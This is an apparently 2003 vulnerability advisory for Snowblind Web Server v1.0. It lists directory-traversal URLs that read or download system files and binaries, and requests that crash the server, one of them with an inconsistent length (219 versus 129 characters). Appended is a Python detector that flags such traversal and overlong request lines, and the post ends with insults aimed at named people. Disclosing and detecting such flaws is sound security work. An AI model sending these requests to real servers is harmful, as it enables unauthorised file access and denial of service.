Snowblind Web Server: multiple issues

From: euronymous (just-a-userat_private)
Date: Fri May 16 2003 - 11:30:35 PDT


    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    topic: Snowblind Web Server: multiple issues
    product: Snowblind Web Server v1.0
    vendor: www.snowblind.net
    risk: high
    date: 05/16/2k3
    tested platform: Windows 98 Second Edition
    discovered by: euronymous /F0KP 
    advisory urls: http://f0kp.iplus.ru/bz/022.en.txt
                   http://f0kp.iplus.ru/bz/022.ru.txt 
    contact email: euronymousat_private
    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    
    description
    -----------
    
    i have found a couple of issues in this http-server. they 
    are: directory traversal and DoS attacks. 
    
    
    directory traversal
    -------------------
    
    1. you can read and download any file outside of the webroot:
    
    http://hostname/../../windows/system.ini
    
    or 
    
    http://hostname/internal.sws?../../windows/system.ini
    
    
    2. also you can download any binary file in this manner:
    
    http://hostname/internal.sws?../../windows/calc.exe
    
    this request will download the program file calc.exe under 
    the name internal.sws
    
    http://hostname/internal.sws?sws.exe
    
    downloads the webserver itself )).
    
    
    3. directory listing outside of the webroot.
    
    note: this bug works only if `Allow directory 
    listings' is turned on [ it is by default ].
    
    http://hostname/.../
    
    will print the contents of the root directory on that 
    disk drive.
    
    
    Denial of Service
    -----------------
    
    1. this url will crash webserver:
    
    http://localhost/
    
    
    2. if you send a GET request that contains >=219 
    charakterz, then you will crash the server..
    
    request example:
    
    GET /fff[ x 129 ]ffff HTTP/1.0
    
    
    shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
    N0b0d13s Team and all russian security guyz!! 
    to kate especially )) 
    hates: slavomira and other dirty ppl in *.kz $#%&^!  
    k0dsweb lamers team == yeah, i really __HATE__ yours!!
              
    
    ================
    im not a lame,
    not yet a hacker
    ================
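
A log-side check for the request shapes listed in this advisory, as an added example that is not part of the original post or of the Snowblind code. The `classify` function, its finding labels and the sample request lines are constructed here, and applying the 219-character threshold to the whole request line is an assumption.

```python
from urllib.parse import unquote

CRASH_LEN = 219  # from the advisory; measured over the whole request line (assumption)

def is_dot_segment(seg):
    """True for '..', '...' and longer dot runs (the advisory uses both forms)."""
    return len(seg) >= 2 and set(seg) == {"."}

def has_traversal(component):
    """Decode once, normalise backslashes, then look for dot-only segments."""
    decoded = unquote(component).replace("\\", "/")
    return any(is_dot_segment(s) for s in decoded.split("/"))

def classify(request_line):
    """Return the sorted findings for one HTTP request line."""
    findings = set()
    if len(request_line) >= CRASH_LEN:
        findings.add("overlong-request")
    parts = request_line.split(" ")
    if len(parts) != 3:
        findings.add("malformed")
        return sorted(findings)
    # internal.sws takes the file name after '?', so check the query as well
    path, _, query = parts[1].partition("?")
    if has_traversal(path):
        findings.add("traversal-in-path")
    if has_traversal(query):
        findings.add("traversal-in-query")
    return sorted(findings)

# Constructed sample request lines, built from the URLs in the advisory.
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /../../windows/system.ini HTTP/1.0",
    "GET /internal.sws?../../windows/calc.exe HTTP/1.0",
    "GET /.../ HTTP/1.0",
    "GET /%2e%2e/%2e%2e/windows/system.ini HTTP/1.0",  # same path, percent-encoded
    "GET /" + "f" * 230 + " HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["clean"], line[:60])
```

The same `has_traversal` test can sit in front of the server as a request filter; it rejects on the decoded segments rather than on a literal `../` match, so the `/.../` form is caught too.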
    


